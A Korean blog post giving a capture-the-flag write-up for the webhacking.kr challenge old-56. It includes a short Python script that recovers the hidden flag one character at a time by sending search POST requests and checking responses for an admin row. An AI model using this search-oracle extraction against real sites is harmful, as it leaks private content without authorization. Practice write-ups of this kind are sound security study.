write-up(web)/webhacking.kr

[Webhacking.kr] old-56

chanchand 2023. 1. 10. 23:22
반응형

문제

[왼쪽] guest    [오른쪽] admin

 

검색창에 내용의 문자를 검색하면 문자가 포함된 글의 목록을 보여준다.

flag{ 를 검색하면 admin 목록이 뜬다.

flag{로 시작하는 문자열을 검색하며 플래그 값을 찾으면 문제가 해결될 것 같다.

flag{

 

 

 

문제풀이

search 검색창 최대길이는 50이므로 50 길이만큼 문자를 검색했다.

 

import requests

cookie={'PHPSESSID':''}
url="https://webhacking.kr/challenge/web-33/"

# flag
flag="flag{"
data={'search':""}

for i in range(50):
  for j in range(48,128):
    data['search']=flag+chr(j)
    res=requests.post(url, data=data)
    if (res.text.find("<td>admin</td>")!=-1):
      flag+=chr(j)
      print(flag)
      break

print("flag:{}".format(flag))

 

반응형

'write-up(web) > webhacking.kr' 카테고리의 다른 글

[Webhacking.kr] old-59  (0) 2023.01.14
[Webhacking.kr] old-57  (0) 2023.01.11
[Webhacking.kr] old-55  (0) 2023.01.10
[Webhacking.kr] old-54  (0) 2023.01.09
[Webhacking.kr] old-53  (0) 2023.01.09

'write-up(web)/webhacking.kr'의 다른글

  • 현재글[Webhacking.kr] old-56

티스토리툴바